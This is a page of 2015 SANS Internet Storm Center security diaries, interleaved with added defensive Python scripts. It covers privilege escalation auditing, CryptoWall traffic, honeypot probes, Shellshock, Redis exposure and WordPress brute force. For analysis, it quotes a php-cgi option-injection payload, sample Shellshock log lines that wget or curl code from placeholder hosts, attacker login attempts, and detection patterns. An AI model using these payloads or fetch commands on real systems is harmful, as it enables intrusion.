Latest Alerts

SANS Internet Storm Center, InfoCON: green

Finding Privilege Escalation Flaws in Linux, (Tue, Jan 20th)

Wed, 01/21/2015 - 06:27

We often tend to ignore privilege escalation flaws. In order to take advantage of these vulnerabilities, an attacker first needs to have access to the system itself. But in particular for systems that many users have access to, it can be difficult to monitor them all for compromised credentials. Systems with web servers often suffer from web application flaws that can be used to execute code as the web server, which then can be used to gain root access via a privilege escalation flaw.

From a defensive point of view, the problem with privilege escalation flaws is that there are so many of them, and they are not limited to bugs that can be patched. Frequently configuration mistakes can give rise to privilege escalation flaws. Auditing your system for these problems should be done regularly to avoid privilege escalation flaws.

For example, a user may create a cron job, and then have root execute the cron job, but the file remains writable by the user. Someone gaining access to the system as this user could now easily escalate privileges by modifying the script.
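The cron case above is easy to check for mechanically. The following audit script is an added example (it is not one of the tools the diary lists, nor ISC code): it reads the system crontab locations that root's cron daemon executes, resolves the program each root entry runs, and reports any script, or parent directory, that a non-root account could modify. The file locations are the usual Debian/Red Hat ones and are assumptions; user crontabs in /var/spool/cron run as their owner, so they are out of scope here.

```python
import os
import stat
import shlex
from pathlib import Path

# Places cron executes entries as root (system crontab format: min hour dom mon dow user command).
# These paths are the conventional ones; adjust for your distribution.
SYSTEM_CRON_FILES = [Path("/etc/crontab"), *sorted(Path("/etc/cron.d").glob("*"))]
PERIODIC_DIRS = [Path(f"/etc/cron.{p}") for p in ("hourly", "daily", "weekly", "monthly")]


def parse_system_crontab_line(line):
    """Return (user, command) for a system crontab entry; None for blanks, comments,
    variable assignments (MAILTO=..., PATH=...) and malformed lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    if line.startswith("@"):                      # @daily user command
        fields = line.split(None, 2)
        return (fields[1], fields[2]) if len(fields) == 3 else None
    fields = line.split(None, 6)                  # five time fields, user, command
    return (fields[5], fields[6]) if len(fields) == 7 else None


def command_path(command):
    """The program cron will execute, when the command starts with an absolute path."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return None
    return tokens[0] if tokens and tokens[0].startswith("/") else None


def audit_mode(st_mode, st_uid, st_gid):
    """Reasons a file that root executes could be modified by a non-root account."""
    reasons = []
    if st_uid != 0:
        reasons.append(f"owned by uid {st_uid} (not root)")
    if st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st_mode & stat.S_IWGRP and st_gid != 0:
        reasons.append(f"group-writable by gid {st_gid}")
    return reasons


def audit_script(path):
    """Findings for one script: its own mode, plus a parent directory that would let a
    user replace the file outright (a sticky world-writable dir such as /tmp does not)."""
    try:
        st = os.stat(path)
    except OSError:
        return []
    reasons = audit_mode(st.st_mode, st.st_uid, st.st_gid)
    parent = os.path.dirname(path) or "/"
    try:
        pst = os.stat(parent)
    except OSError:
        return reasons
    if not (pst.st_mode & stat.S_ISVTX):
        reasons += [f"parent {parent} {r}" for r in audit_mode(pst.st_mode, pst.st_uid, pst.st_gid)]
    return reasons


def audit_root_cron():
    """Map of script path -> reasons, for everything root's cron runs on this host."""
    findings = {}
    for cron_file in SYSTEM_CRON_FILES:
        try:
            lines = cron_file.read_text().splitlines()
        except OSError:
            continue
        for line in lines:
            entry = parse_system_crontab_line(line)
            if entry and entry[0] == "root":
                script = command_path(entry[1])
                if script and (reasons := audit_script(script)):
                    findings[script] = reasons
    for d in PERIODIC_DIRS:                       # run-parts executes every file here as root
        if d.is_dir():
            for script in d.iterdir():
                if reasons := audit_script(str(script)):
                    findings[str(script)] = reasons
    return findings


if __name__ == "__main__":
    for script, reasons in audit_root_cron().items():
        print(f"{script}: {'; '.join(reasons)}")
```

Run it as root (so every cron file is readable) and treat each line of output as a finding to fix, not just a warning: a root-executed script that a service account can write to is a complete privilege escalation path, exactly the case the diary describes.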

Luckily, there are a number of scripts that make it easier for us to find these problems:

unix-privesc-check: Very comprehensive script that works on many Unix flavors, not just Linux. Read the ToDo section at the beginning as it lists other areas that should be checked. The output is sent to stdout, and you had better pipe it to a file as it is very verbose even in default mode.

http://pentestmonkey.net/tools/audit/unix-privesc-check

LinEnum: A more limited script as far as privilege escalation goes, but it does summarize other configuration options nicely.

https://github.com/rebootuser/LinEnum

linuxprivchecker: Similar to LinEnum in that it summarizes system configuration information, not just privilege escalation issues.

http://www.securitysift.com/download/linuxprivchecker.py

And if you prefer to take a more manual approach, or if you need to verify some of the results produced by the scripts, check this very nice cheat sheet:

http://www.rebootuser.com/?p=1623

Any tools I missed? Please let me know!

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, January 21st 2015 http://isc.sans.edu/podcastdetail.html?id=4321, (Wed, Jan 21st)

Tue, 01/20/2015 - 21:29

ISC StormCast for Tuesday, January 20th 2015 http://isc.sans.edu/podcastdetail.html?id=4319, (Tue, Jan 20th)

Mon, 01/19/2015 - 20:24

Traffic Patterns For CryptoWall 3.0, (Mon, Jan 19th)

Mon, 01/19/2015 - 08:39

This is a guest diary submitted by Brad Duncan.

Various sources have reported version 3 of CryptoWall has appeared [1] [2] [3]. This malware is currently seen from exploit kits and phishing emails. CryptoWall is one of many ransomware trojans that encrypt the personal files on your computer and demand a bitcoin payment before you can unlock them.

I got a sample on Wednesday, January 14th 2015 while infecting a virtual machine (VM) from a malicious server hosting the Magnitude exploit kit.

If you're registered with Malwr.com, you can get a copy of this CryptoWall 3.0 sample at:

https://malwr.com/analysis/MDA0MjIzOGFiMzVkNGEzZjg3NzdlNDAxMDljMDQyYWQ/

Let's look at the traffic from my infected VM:

In this example, the infected VM checked ip-addr.es to determine its public IP address. Then the VM communicated with a server at 194.58.109.158 over a non-standard HTTP port. In this case it was port 2525, but I saw different ports in other hosts I've infected with this sample.

Finally, the user viewed a web page for the decrypt instructions at 5.199.166.220.

When monitoring the infection traffic with Security Onion [5], we see an EmergingThreats alert for CryptoWall check-in [4].
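The sequence described above (public-IP lookup, then HTTP to an unusual port) is a behaviour you can hunt for in connection logs independently of the IDS signature. The following is an added example, not part of Brad's diary or Security Onion: it runs over a few constructed flow-log lines (timestamp, source, destination, port, application, server name) and flags internal hosts that contact an IP-check service and then, within five minutes, speak HTTP on a port outside the usual set. The 194.58.109.158:2525 and 5.199.166.220 values come from the diary; the other addresses and the log format are invented for the example.

```python
from collections import defaultdict, namedtuple
from datetime import datetime

# Constructed connection-log lines (not from the diary): ts src dst dport app sni_or_host
SAMPLE_FLOWS = """\
2015-01-14T10:01:02 192.168.1.50 192.0.2.1 443 tls www.example.com
2015-01-14T10:01:05 192.168.1.50 198.51.100.20 80 http ip-addr.es
2015-01-14T10:01:09 192.168.1.50 194.58.109.158 2525 http -
2015-01-14T10:02:40 192.168.1.50 5.199.166.220 80 http -
2015-01-14T10:03:00 192.168.1.51 198.51.100.20 80 http ip-addr.es
2015-01-14T10:03:10 192.168.1.51 192.0.2.1 443 tls www.example.com
2015-01-14T10:04:00 192.168.1.52 192.0.2.77 2525 http -
"""

IP_CHECK_HOSTS = {"ip-addr.es"}          # public-IP lookup service seen in the diary; add others you observe
STANDARD_HTTP_PORTS = {80, 443, 8080}
WINDOW_SECONDS = 300                     # how soon after the IP check the check-in must follow

Flow = namedtuple("Flow", "ts src dst dport app host")


def parse_flow(line):
    ts, src, dst, dport, app, host = line.split()
    return Flow(datetime.fromisoformat(ts), src, dst, int(dport), app, host)


def find_checkin_pattern(log_text):
    """Internal hosts that look up their public IP and then, within the window, speak HTTP
    on a non-standard port. Returns {src: (dst, dport)} for the first such check-in."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            f = parse_flow(line)
            by_src[f.src].append(f)
    hits = {}
    for src, flows in by_src.items():
        flows.sort(key=lambda f: f.ts)
        last_check = None
        for f in flows:
            if f.host in IP_CHECK_HOSTS:
                last_check = f.ts
            elif (last_check is not None and f.app == "http"
                  and f.dport not in STANDARD_HTTP_PORTS
                  and (f.ts - last_check).total_seconds() <= WINDOW_SECONDS):
                hits[src] = (f.dst, f.dport)
                break
    return hits


if __name__ == "__main__":
    for src, (dst, port) in find_checkin_pattern(SAMPLE_FLOWS).items():
        print(f"{src}: public-IP check followed by HTTP check-in to {dst}:{port}")
```

Only 192.168.1.50 is reported: .51 performed the IP check but nothing followed it, and .52 used port 2525 without the preceding lookup. Since the check-in port varies between infections, keying the rule on the two-step behaviour rather than on a port number is what keeps it useful.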

The decryption instructions specify the following bitcoin account for a ransom payment: 1GJRTp9YRKFEvzZCTSaRAzrHskFjEwsZy

Here's what the user would see on their desktop screen:

----------

Brad Duncan is a Security Researcher at Rackspace, and he runs a blog on malware traffic analysis at http://www.malware-traffic-analysis.net

References:

[1] http://malware.dontneedcoffee.com/2015/01/guess-whos-back-again-cryptowall-30.html
[2] http://www.bleepingcomputer.com/forums/t/563169/after-a-brief-hiatus-malware-developers-release-cryptowall-3/
[3] https://forums.malwarebytes.org/index.php?/topic/163485-cryptowall-30/
[4] http://doc.emergingthreats.net/2018452
[5] http://blog.securityonion.net/p/securityonion.html


ISC StormCast for Monday, January 19th 2015 http://isc.sans.edu/podcastdetail.html?id=4317, (Mon, Jan 19th)

Sun, 01/18/2015 - 16:49

Strange & Random GET PHP Queries, (Sun, Jan 18th)

Sun, 01/18/2015 - 15:36

Over the past few months, I have been observing strange web queries against my honeypot where the pattern is always the same: each request is built from a single pair of letters, and each instance uses a different pair. The first directory is the pair repeated, the second directory is that string with its last letter dropped, and the file name is the pair itself. Here are some examples:

/ewew/ewe/ew.php
/fcfc/fcf/fc.php
/bpbp/bpb/bp.php
/wcwc/wcw/wc.php
/ovov/ovo/ov.php

I have also been regularly getting requests for the Linksys CGI script /tmUnblock.cgi (GET/POST) associated with TheMoon Linksys worm [1], the Wordpress login /wp-login.php [2], the Coldfusion administrator page /CFIDE/administrator, as well as a multitude of other requests listed below.

/cgi-bin/test-cgi
/user/soapCaller.bs
/admin.php
/MyAdmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/pma/scripts/setup.php
/a2billing/customer/javascript/misc.js

This last example is URL encoded:

/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

which decodes to [3]:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
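Both request shapes in this diary are easy to recognise automatically once the query is decoded. The following classifier is an added example (not Guy's honeypot code): it matches the doubled-letter-pair path with a regular expression, checks the path against the scanner paths listed above, and decodes the query string to spot php-cgi option injection, where a query without "=" that begins with "-" is handed to old php-cgi builds as command-line switches. The encoded query is the one from the diary, verbatim; the function and label names are mine.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# The /xyxy/xyx/xy.php shape from the diary: one two-letter pair, doubled, then minus its
# last letter, then alone as the file name.
DOUBLED_PAIR_PROBE = re.compile(r"^/([a-z])([a-z])\1\2/\1\2\1/\1\2\.php$")

# Paths the diary lists as regular scanner fodder.
KNOWN_SCANNER_PATHS = {
    "/tmUnblock.cgi", "/wp-login.php", "/CFIDE/administrator", "/cgi-bin/test-cgi",
    "/user/soapCaller.bs", "/admin.php", "/MyAdmin/scripts/setup.php",
    "/phpMyAdmin/scripts/setup.php", "/pma/scripts/setup.php",
    "/a2billing/customer/javascript/misc.js",
}

# The encoded query from the diary, copied verbatim (split only for readability).
SAMPLE_CGI_QUERY = (
    "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
    "+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66"
    "+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E"
    "+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22"
    "+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30"
    "+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30"
    "+%2D%6E"
)


def php_cgi_options(decoded_query):
    """Names of the php.ini directives a decoded query tries to set with -d, or [] when the
    query does not look like a switch list (old php-cgi builds treated such a query as argv)."""
    if not decoded_query.startswith("-"):
        return []
    return re.findall(r"-d\s+([A-Za-z_.]+)=", decoded_query)


def classify(request_target):
    """Label a request target (path plus optional query) or return None when it matches nothing."""
    parts = urlsplit(request_target)
    if DOUBLED_PAIR_PROBE.match(parts.path):
        return "doubled-pair php probe"
    if parts.path in KNOWN_SCANNER_PATHS:
        return "known scanner path"
    if php_cgi_options(unquote_plus(parts.query)):
        return "php-cgi option injection"
    return None


if __name__ == "__main__":
    for target in ("/ewew/ewe/ew.php", "/pma/scripts/setup.php",
                   "/cgi-bin/php?" + SAMPLE_CGI_QUERY, "/index.php?id=1"):
        print(f"{classify(target)!s:28} {target[:60]}")
    print("directives set:", php_cgi_options(unquote_plus(SAMPLE_CGI_QUERY)))
```

Decoding with unquote_plus (so "+" becomes a space, as a CGI wrapper would see it) is the important step: signature matching on the raw percent-encoded string fails as soon as the scanner changes the case of a hex digit or encodes one more character.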

[1] https://isc.sans.edu/forums/diary/More+Details+About+TheMoon+Linksys+Worm/17669
[2] https://isc.sans.edu/forums/diary/Strange+wordpress+login+patterns/19191/
[3] http://www.asciitohex.com

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Shellshock keeps on giving!, (Fri, Jan 16th)

Fri, 01/16/2015 - 10:43

It has been 12 years since the SQL Slammer worm plagued the Interwebs .. come to think of it, that was also in January. But that's not the point :). Today, twelve years later, there are amazingly still infected Slammer drones out there, and if you are running a Honeypot on udp/1434, I promise you won't have to wait all that long until an ancient piece of malware history comes a-knockin.

Odds are that Shellshock exploits won't have the same stamina, primarily because the Shellshock attack is not self-contained wormy in one packet, but rather usually pushed by previously Shellshocked bots that scan for targets. But it still looks like Shellshock scanning and bot-pushing will now be background noise for the foreseeable future, because there is a surprising number of systems out there that remain vulnerable, systems that our sensors then pick up as being part of a Shellbot army. Investigating one of these bots recently, I discovered that it was a Slackware installation from 2007 and appeared to be a remote weather sensor, complete with webcam that showed the (sadly, very green) ski slope below. I managed to track down the owner, a hotel in Switzerland, who were unaware that their weather station contained a computer. If our DShield logs are any indication, there are A LOT of these devices (and hotels, etc ..) out there.

Here is what you can do to help.

The address in the red box - 76.12.A.B in this case - is from where you are being scanned. This does not mean that the originator is evil. Most likely, it is just another weather station or deep fryer where the owner is unaware. So if you contact them, be gentle, and prepared to explain a lot :)

The address in the blue box - 91.142.C.D in this case - is from where the bot code is being pulled. This is most commonly a hacked web server, or a throwaway free website hosting account. In this case, you can locate the hoster via Whois, and make use of their Abuse contact address to let them know. If you include a log snippet like shown above, most hosters will respond and take the bot code down.

A third thing that you can do is download the bot code (carefully :) to your machine, by going to http://91.142.C.D/img.txt in this case. I am not a lawyer (so don't take my word for it) but since the activity is clearly malicious, and since your computer was instructed by the scanning bot to download this code, I would say that doing so on your own is okay. The bot code itself is not very interesting, but the ones we've seen so far are usually written in Perl, and contain a hard-coded IP address used for the Command & Control. Again, you can determine the hoster of that C&C address via Whois, and let them know.

The latter two measures will though leave the original victim infected and vulnerable. So .. if you have the time and patience, and it looks like the scanning host is in a residential or small business address range (think DSL), then it might be worthwhile to try and contact the original victim (76.12.A.B above), and enlighten them about all the unexpected things in life that contain a computer these days.

Another word of caution: Obviously, a bot that is scanning you for the presence of Shellshock is most likely vulnerable to Shellshock itself, and missing a plethora of other patches. You might be tempted to poke back at the system, and use the Shellshock conduit on your own to determine what is inside. Doing so though is hacking, and illegal. Owners of hacked systems do not appreciate getting hacked once more by researchers, no matter how allegedly well-intentioned the researcher is. For the hotel weather station that I mention above, I used a passive combination of reverse DNS, Google, archive.org, Netcraft and Whois to determine what it was, and whom to contact.
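The "red box" and "blue box" addresses can be pulled out of a web server log automatically, which makes the notification routine above repeatable. The script below is an added example, not ISC code: it runs over a few constructed combined-format log lines (the diary's screenshot is not reproduced here), keeps the requests whose Referer or User-Agent header carries the Shellshock function-definition marker, and returns the scanning source (to notify the owner) and the hosts the payload fetches code from (to notify the hoster). All addresses in the sample are documentation ranges chosen for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed combined-format log lines (not the diary's screenshot). The scanner puts the
# bash function-definition string in a header; the payload pulls bot code from a second host.
SAMPLE_LOG = r'''
192.0.2.10 - - [16/Jan/2015:09:12:03 +0000] "GET /cgi-bin/status HTTP/1.1" 404 292 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.7/img.txt -O /tmp/.x\""
198.51.100.77 - - [16/Jan/2015:09:13:10 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
192.0.2.11 - - [16/Jan/2015:09:14:55 +0000] "GET / HTTP/1.0" 200 1043 "() { :;}; curl -o /tmp/.y http://203.0.113.5/x.pl" "-"
'''

# The Shellshock marker: a bash function definition at the start of an environment value.
SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{\s*:;\s*\};")
URL_RE = re.compile(r"https?://[^\s\"'<>;]+")
# src ident user [time] "request" status bytes "referer" "user-agent"  (quoted fields may contain \")
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" \d+ \S+ "((?:[^"\\]|\\.)*)" "((?:[^"\\]|\\.)*)"$'
)


def parse_shellshock_hits(log_text):
    """One record per request carrying the marker: scanning source, time and payload URLs."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, when, _request, referer, user_agent = m.groups()
        header_values = referer + " " + user_agent
        if not SHELLSHOCK_MARKER.search(header_values):
            continue
        hits.append({"scanner": src, "time": when, "payload_urls": URL_RE.findall(header_values)})
    return hits


def report_targets(hits):
    """Whom to notify: owners of the scanning hosts (red box) and hosters of the machines
    serving the bot code (blue box), each listed once."""
    scanners = sorted({h["scanner"] for h in hits})
    payload_hosts = sorted({urlsplit(u).hostname for h in hits for u in h["payload_urls"]})
    return {"scanner_owners": scanners, "payload_hosts": payload_hosts}


if __name__ == "__main__":
    found = parse_shellshock_hits(SAMPLE_LOG)
    for h in found:
        print(f"{h['time']}  scanned by {h['scanner']}  code hosted at {h['payload_urls']}")
    print(report_targets(found))
```

The log line for each hit is exactly the snippet to attach to the abuse report; the hoster of a payload host is then a Whois lookup away, as the diary describes, and nothing here touches the scanning system itself.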


ISC StormCast for Friday, January 16th 2015 http://isc.sans.edu/podcastdetail.html?id=4315, (Fri, Jan 16th)

Thu, 01/15/2015 - 17:29

tcp/6379 trolling - Redis NoSQL? Or something else?, (Thu, Jan 15th)

Thu, 01/15/2015 - 16:39

DShield sensors report an uptick of scanning for tcp/6379, currently mostly originating from 61.160.x and 61.240.144.x, which are both CHINANET/UNICOM. tcp/6379 is the default port of the Redis NoSQL database (http://redis.io). Redis by default accepts connections from any host, and the Redis security documentation states:

"Redis is designed to be accessed by trusted clients inside trusted environments. This means that usually it is not a good idea to expose the Redis instance directly to the internet"

which makes us wonder if the service scanned for in this case is indeed Redis, or something else?
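Whatever the scanners are after, an exposed Redis is found by them eventually, and the exposure is decided by two lines of redis.conf. The following is an added example (not ISC code, not part of Redis): it parses two constructed configuration fragments, one with the defaults that listen everywhere without a password and one hardened to loopback with requirepass, and lists what would let a scanner reach the instance. The placeholder password is just that.

```python
# Two redis.conf fragments constructed for this example (not from any real deployment).
WEAK_CONF = """
# bind 127.0.0.1
port 6379
# requirepass foobared
"""

HARDENED_CONF = """
bind 127.0.0.1 ::1
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
"""

LOOPBACK = {"127.0.0.1", "::1"}
ALL_INTERFACES = {"0.0.0.0", "::", "*"}


def parse_redis_conf(text):
    """Directive name -> list of argument strings, ignoring comments and blank lines."""
    directives = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, args = line.partition(" ")
        directives.setdefault(name.lower(), []).append(args.strip())
    return directives


def audit_redis_conf(text):
    """Findings that would let an Internet scanner, like the tcp/6379 sweep above, reach an
    unauthenticated Redis. An empty list means loopback-only with a password set."""
    conf = parse_redis_conf(text)
    port = conf.get("port", ["6379"])[0]
    addrs = [a for args in conf.get("bind", []) for a in args.split()]
    findings = []
    if not addrs or any(a in ALL_INTERFACES for a in addrs):
        findings.append(f"listens on all interfaces (no bind directive or bind 0.0.0.0), port {port}")
    else:
        for a in addrs:
            if a not in LOOPBACK:
                findings.append(f"bound to non-loopback address {a}; restrict tcp/{port} at the firewall")
    if not any(conf.get("requirepass", [])):
        findings.append("no requirepass: any client that can connect has full access")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or ["ok"])
```

A non-loopback bind is reported rather than rejected outright, because an application server on another host is a legitimate reason for it; the point is that it then needs a firewall rule and a password, not that it is forbidden.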


Strange wordpress login patterns, (Thu, Jan 15th)

Thu, 01/15/2015 - 15:48

Reader Robert came to us today with a very interesting situation. He noticed odd wordpress login patterns:

T 31.47.254.62:51020 - +http://www.google.com/bot.html).
Host: **redacted**
Accept: */*.
Cookie: wordpress_test_cookie=WP+Cookie+check.
Content-Length: 131.
Content-Type: application/x-www-form-urlencoded.
.
log=admin&pwd=admin%21%21%21&wp-submit=Log+In&redirect_to=http://**redacted**/wp-admin/tes1a0

T 62.210.207.146:43322 - +http://www.google.com/bot.html).
Host: **redacted**
Accept: */*.
Cookie: wordpress_test_cookie=WP+Cookie+check.
Content-Length: 113.
Content-Type: application/x-www-form-urlencoded.
.
log=ahenry&pwd=Ahenry%24%24%24&wp-submit=Log+In&redirect_to=http://**redacted**/wp-admin/tes1a0

T 109.199.82.5:46902 - +http://www.google.com/bot.html).
Host: **redacted**
Accept: */*.
Cookie: wordpress_test_cookie=WP+Cookie+check.
Content-Length: 110.
Content-Type: application/x-www-form-urlencoded.
.
log=natemc&pwd=Johns666&wp-submit=Log+In&redirect_to=http://**redacted**/wp-admin/tes1a0

... tes1a0 in the Wordpress 4.1 installation download and it's not part of the code. It ...

Have you seen these kinds of wordpress attempts? If yes, let us know via the contact form. I will update the diary with the information gathered.

Manuel Humberto Santander Pelez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org
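One thing the captures above make obvious is that the requests claim to be Googlebot while submitting the login form, which a crawler never does. The following is an added example (not Robert's capture tooling or ISC code): it models the three POSTs as request records with the form separators restored, plus two benign requests, and flags any login POST carrying a crawler User-Agent, decoding the submitted username and password so you can tell a default-credential probe from a credential-stuffing run. The record format, the benign requests and the redirect host are constructed.

```python
from urllib.parse import parse_qs

# Constructed request records modelled on the captures above (separators restored; the
# redirect host and the two benign requests are invented for the example).
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
SAMPLE_REQUESTS = [
    {"src": "31.47.254.62", "method": "POST", "path": "/wp-login.php", "ua": GOOGLEBOT_UA,
     "body": "log=admin&pwd=admin%21%21%21&wp-submit=Log+In&redirect_to=http://example.invalid/wp-admin/"},
    {"src": "62.210.207.146", "method": "POST", "path": "/wp-login.php", "ua": GOOGLEBOT_UA,
     "body": "log=ahenry&pwd=Ahenry%24%24%24&wp-submit=Log+In&redirect_to=http://example.invalid/wp-admin/"},
    {"src": "109.199.82.5", "method": "POST", "path": "/wp-login.php", "ua": GOOGLEBOT_UA,
     "body": "log=natemc&pwd=Johns666&wp-submit=Log+In&redirect_to=http://example.invalid/wp-admin/"},
    {"src": "203.0.113.9", "method": "GET", "path": "/", "ua": GOOGLEBOT_UA, "body": ""},
    {"src": "198.51.100.7", "method": "POST", "path": "/wp-login.php",
     "ua": "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0",
     "body": "log=editor&pwd=correct-horse-battery&wp-submit=Log+In&redirect_to=http://example.invalid/wp-admin/"},
]

CRAWLER_MARKERS = ("googlebot", "bingbot", "yandexbot")


def login_fields(body):
    """Username and decoded password from a wp-login.php form body."""
    form = parse_qs(body, keep_blank_values=True)
    return form.get("log", [""])[0], form.get("pwd", [""])[0]


def claims_crawler(user_agent):
    return any(marker in user_agent.lower() for marker in CRAWLER_MARKERS)


def flag_crawler_logins(requests):
    """Search-engine crawlers fetch pages; they never submit the login form. A POST to
    wp-login.php wearing a crawler User-Agent is therefore a spoofed UA worth blocking.
    Returns (source, username, password) for each such request."""
    hits = []
    for r in requests:
        if r["method"] == "POST" and r["path"].endswith("/wp-login.php") and claims_crawler(r["ua"]):
            user, pwd = login_fields(r["body"])
            hits.append((r["src"], user, pwd))
    return hits


if __name__ == "__main__":
    for src, user, pwd in flag_crawler_logins(SAMPLE_REQUESTS):
        print(f"{src}: spoofed crawler UA, tried {user!r} / {pwd!r}")
```

The crawler GET from 203.0.113.9 and the browser login from 198.51.100.7 are left alone. Where you need to be sure a source really is Googlebot, the documented check is a reverse DNS lookup of the source address followed by a forward lookup of the resulting googlebot.com or google.com name; the three sources above would not pass it.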


ISC StormCast for Thursday, January 15th 2015 http://isc.sans.edu/podcastdetail.html?id=4313, (Thu, Jan 15th)

Wed, 01/14/2015 - 18:43

Which security tool is your favorite?, (Wed, Jan 14th)

Wed, 01/14/2015 - 14:00

Toolswatch published today the best 2014 security tools according to their readers. From that list I like OWASP ZAP, BeEF, OWASP Xenotix and PeStudio. However, I definitely miss some tools like the ones contained in the REMnux distro for malware analysis, DFF and the SANS SIFT 3 distro for forensics, not to mention Wireshark and tcpdump, which I find unique for anomaly detection.

Which security tool is your favorite? Do you agree with the tools listed? Let us know via contact form or comment to this diary.

Manuel Humberto Santander Pelez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org


Please help us make the ISC better, and participate in our annual survey https://www.surveymonkey.com/s/DHZVY28, (Wed, Jan 14th)

Wed, 01/14/2015 - 09:22

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


ISC StormCast for Wednesday, January 14th 2015 http://isc.sans.edu/podcastdetail.html?id=4311, (Wed, Jan 14th)

Tue, 01/13/2015 - 17:33

Adobe Patch Tuesday - January 2015, (Tue, Jan 13th)

Tue, 01/13/2015 - 12:25

Adobe released one bulletin today, affecting Flash Player. The update should be applied to the Windows, OS X as well as Linux versions of Adobe's Flash Player. It is rated with a priority of 1 for most Windows versions of Flash Player.

Adobe AIR, as well as browsers like Chrome and Internet Explorer, are affected as well.

http://helpx.adobe.com/security/products/flash-player/apsb15-01.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Microsoft Patch Tuesday - January 2015 (Really? Telnet?), (Tue, Jan 13th)

Tue, 01/13/2015 - 10:26

Overview of the January 2015 Microsoft patches and their status.

For each bulletin: title (with the bulletins it replaces), affected product, CVE and KB (contra indications), known exploits, Microsoft rating(**) and the ISC rating(*) for clients and servers.

MS15-001  Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (Replaces MS13-031, MS13-046, MS13-048, MS13-063)
          Affected: Microsoft Windows
          CVE-2015-0002, KB 3023266; known exploits: vuln. public.
          Microsoft rating: Severity Important, Exploitability 2
          ISC rating: clients Important, servers Important

MS15-002  Vulnerability in Windows Telnet Service Could Allow Remote Code Execution
          Affected: Microsoft Windows
          KB 3020393
          Microsoft rating: Severity Critical, Exploitability 2
          ISC rating: clients Important, servers Critical

MS15-003  Vulnerability in Windows User Profile Service Could Allow Elevation of Privilege
          Affected: Microsoft Windows
          CVE-2015-0004, KB 3021674; known exploits: vuln. public.
          Microsoft rating: Severity Important, Exploitability 2
          ISC rating: clients Important, servers Important

MS15-004  Vulnerability in Windows Components Could Allow Elevation of Privilege
          Affected: Microsoft Windows
          CVE-2015-0016, KB 3025421
          Microsoft rating: Severity Important, Exploitability 0
          ISC rating: clients Important, servers Important

MS15-005  Vulnerability in Network Location Awareness Service Could Allow Security Feature Bypass
          Affected: Microsoft Windows
          CVE-2015-0006, KB 3022777
          Microsoft rating: Severity Important, Exploitability 3
          ISC rating: clients Important, servers Important

MS15-006  Vulnerability in Windows Error Reporting Could Allow Security Feature Bypass (Replaces MS14-071)
          Affected: Microsoft Windows
          CVE-2015-0001, KB 3004365
          Microsoft rating: Severity Important, Exploitability 2
          ISC rating: clients Important, servers Important

MS15-007  Vulnerability in Network Policy Server RADIUS Implementation Could Cause Denial of Service
          Affected: Microsoft Windows
